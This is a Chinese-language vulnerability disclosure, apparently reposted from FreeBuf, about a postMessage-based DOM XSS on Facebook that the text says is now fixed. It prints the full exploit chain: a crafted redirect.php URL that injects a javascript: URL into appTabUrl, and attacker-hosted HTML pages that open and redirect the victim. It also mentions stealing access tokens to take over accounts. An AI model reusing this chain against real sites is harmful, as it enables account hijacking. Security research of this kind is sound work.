如何使用postMessage利用Facebook中基于DOM的XSS漏洞

概述

我们发现的第一个漏洞将允许一名恶意攻击者从facebook.com域名并通过postMessage来发送跨域消息。存在漏洞的终端节点将接收请求参数中用户可控制的内容，并使用postMessage中的发送消息来构建一个数据对象，该对象将与postMessage一起发送到已打开的窗口。接下来，我们所发现的第二个漏洞跟第一个漏洞有关，攻击者可以利用这个漏洞来根据Eventlistener接收到的表单提交数据来构造一个不安全的脚本。

从facebook.com源通过postMessage发送消息

存在漏洞的节点为https://www.facebook.com/payments/redirect.php，这个节点的响应信息可以由各种参数来控制。我们发现的其中一个有意思的参数为“type”，这个参数如果从平时的“i”改成了“rp”的话，它将会它将使用postMessage与打开该页面的窗口通信（如果是“i”，那么它将使用window.parent.paymentsFlows.processIFrame方法）。

需要注意的是，目标源需要设置为our.intern.facebook.com。现在，我们知道postMessage方法仅会提供给Facebook的员工使用，因为our.intern.facebook.com这个域名只有他们才拥有完整的访问权，如果不是Facebook的员工，则会被重定向至www.facebook.com。

在这里，我试图通过访问另一个域中的同一个节点alpha.facebook.com来绕过这种限制。如果访问的是our.alpha.facebook.com/payments/redirect.php，它将会返回到our.alpha.facebook.com，因为postMessage中的targetOrigin设置的就是这个地址。跟our.intern不同的是，our.alpha不会重定向至www.。这里要注意，our.alpha.facebook.com域名包含的内容跟www.facebook.com其实是一样的。这样，我们的消息就可以传递到打开的窗口了，因为targetOrigin条件已经满足，并且会将消息发送到our.alpha.facebook.com。

现在，我们已经知道了我们要找的是包含了EventListeners的页面，而它只接收消息源为accept facebook.com的消息。

XSS漏洞的发现和利用

Facebook Canvas应用程序托管在apps.facebook.com上，如果你访问了这个域名所托管的应用程序，你将会发现Facebook会加载一个iframe中的URL，并向这个URL地址发送一个包含了类似“signed_request”参数的POST新消息。

通过跟踪请求源，我发现这个页面同样加载了iframe中的https://www.facebook.com/platform/page_proxy/？version=X，然后用postMessage向其发送消息。

page_proxy这个页面中包含下列代码：

上述这段代码主要完成了两件事情。首先，它会利用postMessage将带有frameName的消息发送到任何源。其次，它将设置一个EventListener并等待接收消息。如果收到了一条满足所有条件的消息，它将在根据消息中的数据设置其属性之后提交一个form表单。

表单构造方法submitForm()有趣的地方就在于，这个表单中的action属性会被直接设置为“a.data.params.appTabUrl”，这个地址是通过消息来接收的。URL中的“appTabUrl”字符串中的URL没有检查是否以http/https开头，因此我们就可以使用JavaScript来实现利用XSS漏洞了。

接下来，我们需要在page_proxy脚本中构造一个包含了满足所有条件的Payload对象，具体如下所示：

https://our.alpha.facebook.com/payments/redirect.php?type=rp&name=_self&params[appTabUrl]=javascript:alert(1);&params[signedRequest]=SIGNED_X&platformAppControllerGetFrameParamsResponse=1

OBJ: {“type”:”rp”,”name”:”_self”,”params”:{“appTabUrl”:”javascript:alert(1);”,”signedRequest”:”SIGNED_X”},”platformAppControllerGetFrameParamsResponse”:”1″}

漏洞利用

目标用户需要访问攻击者托管的恶意网站，该网站页面中需要包含下列代码：

<html>

<button class="button" onClick="window.open('https://attacker/page2.html', '_blank');document.location.href = 'https://our.alpha.facebook.com/platform/page_proxy/?version=X#_self';">

<span class="icon">Start Attack</span>

</button>

</html>

在这里，我们不打算直接重定向到page_proxy节点，因为我们需要设置一个延时来确保https://www.facebook.com/platform/page_proxy/的成功加载。

page2.html：

<html>

<script>

setTimeout(function(){ window.location.href = 'https://our.alpha.facebook.com/payments/redirect.php?type=rp&merchant_group=86&name=_self&params[appTabUrl]=javascript:alert(1);&params[signedRequest]=SIGNED_X&platformAppControllerGetFrameParamsResponse=1';} ,3000);

</script>

</html>

这里我设置了一个三秒的延迟，然后重定向到存在漏洞的页面中，并执行alert(1)，而我设置的PoC将会窃取用户的访问令牌，这个令牌将直接允许我们接管目标Facebook账号。

漏洞修复

Facebook目前已成功修复了该漏洞，他们直接将支付重定向（/payments/redirect.php）中的postMessage组件移除了，并在appTabUrl中添加了针对http/https的检测。

原文来自: FreeBuf